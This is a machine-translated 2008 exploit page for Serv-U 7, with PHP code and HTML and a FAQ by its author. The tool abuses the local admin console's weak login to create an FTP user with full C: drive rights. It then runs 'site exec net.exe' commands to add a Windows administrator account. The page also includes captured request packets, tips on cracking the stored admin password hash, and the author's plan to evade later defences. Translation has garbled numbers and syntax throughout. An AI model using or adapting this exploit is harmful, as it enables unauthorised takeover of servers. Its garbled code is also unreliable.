serv-u 7 local exp local overflow mention the right-vulnerability warning-the black bar safety net

<?
/*
serv-u 7 local exp ver 1.0
www.inbreak.net
author [email protected] 2008-11-19
modify 2008-11-20
/
/
The following is the main data packet, for everyone to study. If you use asp and other languages and then written once and can reference.
Global user list:
GET /Admin/XML/OrganizationUsers. xml&ID=1 6 1&sync=1 2 2 7 0 7 8 6 2 5 0 7 8&ForceList=1 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: <http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1&gt;
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; . NET CLR 1.1.4322)
Host: 127.0.0.1:4 3 9 5 8
Connection: Keep-Alive
Cookie: domainid=3 8 4 1; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false;
killmenothing;
Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754
581406246bf8

Global c:/RWADNELCRNI:
POST /Admin/XML/Result. xml? Command=AddObject&Object=CServer. 0. DirAccess&Sync=1 2 2 7 0 8 1 2 6 1 6 4 0 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: <http://127.0.0.1:43958/Admin/ServerDir.htm?Page=1&gt;
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:4 3 9 5 8
Content-Length: 6 7
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3 8 4 1; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8

Access=7 9 9 9&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&

this user c:/RWADNELCRNI:
POST /Admin/XML/Result. xml? Command=AddObject&Object=CUser. 6 1 8 0 6 0. DirAccess&Sync=1 2 2 7 0 8 1 4 3 7 8 2 8 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: <http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1&gt;
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:4 3 9 5 8
Content-Length: 6 7
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3 8 4 1; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8

Access=7 9 9 9&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&

------------------------------Deficiencies---------------
Look forward to everyone to beautify this tool
For the su to set up the environment too much
Please here fill in the…

*/
?& gt;
<html>
<title>Serv-u 7 local exp ver 1.0 by kxlzx</title>
<body>
<script>
function fun_showDiv(show)
{
document. getElementById(show). style. display=“block”;
}
</script>
<b>Serv-u 7 local exp ver 1.0 by kxlzx</b>
<form id=“form1” name=“form1” method=“post” action=“?”& gt;
<p><a href=“#” >admin password</a>
<input type=“text” name=“admin_pwd” value=“” />
</p>
<p>directly mention the rights!
<input type=“submit” name=“cmd” value=“right” />
<a href=“#” >QA</a>
</p>
<pre>

<?

//Global var
$port=4 3 9 5 8;
$host=“127.0.0.1”;
$sessionid=“”;
$getuserid=“”;
$ftpport=2 1;
$ftpuser=“kxlzx_hacked”;
$ftppwd=$_POST[‘admin_pwd’];
$exec_addUser=“site exec c:/windows/system32/net.exe user “.$ ftpuser.” “.$ ftppwd.” /add”;
$exec_addGroup=“site exec c:/windows/system32/net.exe localgroup administrators “.$ ftpuser.” /add”;

if($_POST[‘cmd’]) {

//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL=‘/Web%20Client/Login. xml? Command=Login&Sync=1 5 4 3 5 4 3 5 4 3 5 4 3 5 4 3’;
$post_data_login[‘user’] = “”;
$post_data_login[‘pword’] = $ftppwd;
$post_data_login[‘language’] = “zh%2CCN&”;
$ref=“http://”.$ host.“:”.$ port.“/? Session=3 9 8 9 3&Language=zh,CN&LocalAdmin=1”;
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1 2 8 0);
$sessionid = getmidstr(“<sessionid>”,“</sessionid>”,$result);
if ($sessionid!=“”)
echo “login successful!\ r\n”;
fclose($sock_login);//login-----------------------------------------

//getOrganizationId-------------------------------
$OrganizationId=“”;
$sock_OrganizationId = fsockopen($host, $port);
$URL=‘/Admin/ServerUsers. htm? Page=1’;
$postStr = createRequest($port,$host,$URL,“”,$sessionid,“”);
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId=“”;
while(! feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1 0 2 4);
$resultOrganizationId=$resultOrganizationId.$ result;
}
$strTmp = “OrganizationUsers. xml&ID=”;
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+1 5);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,“"”));
fclose($sock_OrganizationId);
if ($OrganizationId!=“”)
echo “get OrganizationId”.$ OrganizationId." Success!\ r\n";
//getOrganizationId-------------------------------

//getuserid---------------------------------------
$getuserid=“”;
$sock_getuserid = fsockopen($host, $port);
$URL=“/Admin/XML/User. xml? Command=AddObject&Object=COrganization.”.$ OrganizationId.“. User&Temp=1&Sync=5 4 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 3”;
$ref=“http://”.$ host.“:”.$ port.“/ Admin/ServerUsers. htm? Page=1”;
$post_data_getuserid=“”;
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1 2 8 0);
$result = getmidstr(“<var name="ObjectID" val="”,“" />”,$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!=“”)
echo “get user ID”.$ getuserid." Success!\ r\n";
//getuserid---------------------------------------

//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL=“/Admin/XML/Result. xml? Command=UpdateObject&Object=COrganization.”.$ OrganizationId.“. User.”.$ getuserid.“& amp;Sync=1 2 2 7 0 7 1 1 9 0 2 5 0”;
$post_data_adduser[‘LoginID’] = $ftpuser;
$post_data_adduser[‘FullName’] = “”;
$post_data_adduser[‘Password’] = ‘!’;
$post_data_adduser[‘ComboPasswordType’] = “%E5%B8%B8%E8%A7%8 4%E5%AF%8 6%E7%A0%8 1”;
$post_data_adduser[‘PasswordType’] = “0”;
$post_data_adduser[‘ComboAdminType’] = “%E6%9 7%A0%E6%9D%8 3%E9%9 9% 9 0”;
$post_data_adduser[‘AdminType’] = “”;
$post_data_adduser[‘ComboHomeDir’] = “/c:”;
$post_data_adduser[‘HomeDir’] = “/c:”;
$post_data_adduser[‘ComboType’] = “%E6%B0%B8%E4%B9%8 5%E5%B8%9 0%E6%8 8%B7”;
$post_data_adduser[‘Type’] = “0”;
$post_data_adduser[‘ExpiresOn’] = “0”;
$post_data_adduser[‘ComboWebClientStartupMode’] = “%E6%8F%9 0%E7%A4%BA%E7%9 4%A8%E6%8 8%B7%E4%BD%BF%E7%9 4%A8%E4%BD%9 5%E7%A7%8D%E5%AE%A2%E6%8 8%B7%E7%AB%AF”;
$post_data_adduser[‘WebClientStartupMode’] = “”;
$post_data_adduser[‘LockInHomeDir’] = “0”;
$post_data_adduser[‘Enabled’] = “1”;
$post_data_adduser[‘AlwaysAllowLogin’] = “1”;
$post_data_adduser[‘Description’] = “”;
$post_data_adduser[‘IncludeRespCodesInMsgFiles’] = “”;
$post_data_adduser[‘ComboSignOnMessageFilePath’] = “”;
$post_data_adduser[‘SignOnMessageFilePath’] = “”;
$post_data_adduser[‘SignOnMessage’] = “”;
$post_data_adduser[‘SignOnMessageText’] = “”;
$post_data_adduser[‘ComboLimitType’] = “%E8%BF%9E%E6%8E%A5”;
$post_data_adduser[‘LimitType’] = “Connection”;
$post_data_adduser[‘QuotaBytes’] = “0”;
$post_data_adduser[‘Quota’] = “0”;
$post_data_adduser[‘Access’] = “7 9 9 9”;
$post_data_adduser[‘MaxSize’] = “0”;
$post_data_adduser[‘Dir’] = “%25HOME%2 5”;
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,“http://127.0.0.1”.“:”.$ port.“/ Admin/ServerUsers. htm? Page=1”);
fputs($sock_adduser, $postStr,strlen($postStr));
$result = fread($sock_adduser, 1 2 8 0);
fclose($sock_adduser);
echo “Add User success!\ r\n”;
//adduser-----------------------------------------

//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL=“/Admin/XML/Result. xml? Command=AddObject&Object=CUser.”.$ getuserid.“. DirAccess&Sync=1 2 2 7 0 8 1 4 3 7 8 2 8”;
$post_data_addpower[‘Access’] = “7 9 9 9”;
$post_data_addpower[‘MaxSize’] = “0”;
$post_data_addpower[‘Dir’] = “/c:”;
$post_data_addpower[‘undefined’] = “undefined”;
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,“http://127.0.0.1”.“:”.$ port.“/ Admin/ServerUsers. htm? Page=1”);
fputs($sock_addpower, $postStr,strlen($postStr));
$result = fread($sock_addpower, 1 2 8 0);
fclose($sock_addpower);
echo “add the permissions to success!\ r\n”;

//addpower-----------------------------------------

//exec-------------------------------
$sock_exec = fsockopen(“127.0.0.1”, $ftpport, &$errno, &$errstr, 1 0);
$recvbuf = fgets($sock_exec, 1 0 2 4);
$sendbuf = “USER “.$ ftpuser.”\ r\n”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);

$sendbuf = “PASS!\r\n”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);

$sendbuf = $exec_addUser.“\ r\n”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1 0 2 4);
echo “executing”.$ exec_addUser.“\ r\n return$recvbuf\r\n”;

$sendbuf = $exec_addGroup.“\ r\n”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1 0 2 4);

echo “executing”.$ exec_addGroup.“\ r\n return$recvbuf\r\n”;
fclose($sock_exec);
echo “well, Your 3 3 8 9 up clean-up ftp users log right now!\ r\n”;
//exec-------------------------------

}

/** function createRequest
@author : kxlzx 2008-11-19
@port_post : administrator port $port=4 3 9 5 8;
@host_post : host $host=“127.0.0.1”;
@URL_post : target $URL=‘/Web%20Client/Login. xml? Command=Login&Sync=1 5 4 3 5 4 3 5 4 3 5 4 3 5 4 3’;
@post_data_post : arraylist $post_data[‘user’] = “”;…
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string=“”;
if ($post_data_post!=“”)
{
foreach($post_data_post as $key=>$value)
{
$values[]=“$key=”. urlencode($value);
}
$data_string=implode(“&”,$values);
}
$request.=" POST “.$ URL_post.” HTTP/1.1\r\n";
$request.=" Host: “.$ host_post.”\ r\n";
$request.=" Referer: “.$ referer.”\ r\n";
$request.=" Content-type: application/x-www-form-urlencoded\r\n";
$request.=" Content-length: “. strlen($data_string).”\ r\n";
$request.=" User-Agent: Serv-U\r\n";
$request.=" x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; . NET CLR 1.1.4322)\r\n";
$request.=" Accept: /\r\n";
$request.=" Cache-Contr no-cache\r\n";
$request.=" UA-CPU: x86\r\n";

if ($sessionid!=“”)
{
$request.=" Cookie: Session=“.$ sessionid.”\ r\n";
}
$request.=“\ r\n”;
$request.=$ data_string.“\ r\n”;

return $request;
}

//getMidfor2str copy from the internet
function getmidstr($L,$R,$str)
{
$int_l=strpos($str,$L);
$int_r=strpos($str,$R);
If ($int_l>-1&&$int_l>-1)
{
$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
return $str_put;
}
else
return “did not find the required variables, 请联系[email protected]”;
}
?& gt;
</pre>
</form>
<div id=“adminpassdiv” style=“display:none”>
<pre>
The default is empty, if the password is empty, the<b>to fill anything in.& lt;/b>
If modified, the administrator password the default will be here:
<b>C:\Program Files\RhinoSoft. com\Serv-U\Users\Local Administrator Domain\. Archive</b>
File find a MD5 password value.
C:\Program Files\RhinoSoft. com\Serv-U
Is su to the root directory.
Password value of style is(assuming that is 1 2 3 4 5 6)
kx#######################
#Representatives 1 2 3 4 5 6 a 3 2-bit MD5 encryption, and kx is su to the md5 cryptographic algorithm to improve the random 2-bit characters.
After the break the password is<b>kx</b>1 2 3 4 5 6 Remove the kx is the password.
You can for this encryption to generate a dictionary.

auther:kxlzx www.inbreak.net
</pre>
</div>
<div id=“QAdiv” style=“display:none”>
<pre>
<b>A, The su7 is the right there are several way?& lt;/b>
There are two forms to get rid of su7 in.
1>, login to the Administrator Console page
==>get the OrganizationId for Add User
==>get the global user of the“next new user ID”
==>add a user
==>add user permissions or add a global user permission
==>user login
==>execute system command to add the system account.
2>, login to the Administrator Console page
==>basic WEB client
==>come to serv-u Directory–users–Global user directory
==>upload the one you have defined in the user file
==>user login
==>execute system command to add the system account
While this document uses the<b>first</b>method.
<b>second, the mention of the right to the principle?& lt;/b>
Su7 Management Platform is http, very advanced.
Capture, analysis, found the following walk can be utilized.
1, The administrator from the Management Console open the web page, is not required to verify the password.
2, The administrator if using a URL to open the web page, although the need to enter a password, but no matter what to enter, can enter.“/? Session=3 9 8 9 3&Language=zh,CN&LocalAdmin=1”
3, The administrator can add users there are two, one is a global user, one is a domain user. While the permission set is also two, one is global, one is for the user.
4, The administrator added the user of this package and set the permissions for this pack, is separate.
So, I can capture and then converted into a php socket connection post out.
Finally, in classic ftp login, and exec commands. To improve the right.
In writing php in the process, encountered many problems, such as function not used, etc—_—! I haven’t learned php thanks to the“cloud Shu cow”to help you.
In the analysis of the Packet Flow, and found some of the features, the server returns the data, all in xml format. While in the process of data transmission, The design is very classic.
Su7 also has its own database, and he also will own generated an id.
This ID is random, in that you create a user, will first request that the server generate one, generate a good post, modify the id of the user name, password, etc.
It’s like the oracle of the insert means.

Write tools in the process, encountered a lot of trouble, the biggest trouble is this ID problem, and later analyze it.
To add permissions, but also can make use of this ID.
Thus the tool a total connected 6 times to the server, which several times are:
1, to the landing platform, and use that input any password can be the landing page address. Returns a sessionid, this sessionid in the future of the package are used up.
2, get the OrganizationId for Add User
3, to request a user ID.
4, modify the ID of the login user name, and password.
5, modify the ID of the permission, plus the c drive write delete execute etc.
6, this connection is doing bad, use the previous add the user to perform system commands.
<b>three, why should I display a success, but not up there?& lt;/b>
It depends on error code, here even very ashamed, and did not write a detailed error code of the judge.
Generally have the following several situations:
1, It may be because the administrator password is wrong.
Referring to the administrator password of the connection.
2, it may be because the administrator limits the execution of the SITE EXEC.
To be program modifications, the program can be added to a so that he does not limit function.
3, may be a program problem.
<b>4, why the author has so many reasons not to change?& lt;/b>
Don’t you see? Once the things done to perfection, that the comparison system of the defense program came out.
If imperfect, let him think we this point means that the defense system will also think so.
Do not believe it, over a period of time, the defensive scheme out, there certainly is one:“to modify the site exec is not access.”
When the time comes, I’ll write a function, put this thing changed back.
So, like everyone is promoted to XXXX, I’ll solve XXXX problem. Everyone first so play it.:)

auther:kxlzx www.inbreak.net

</pre>
</div>
</body>
</html>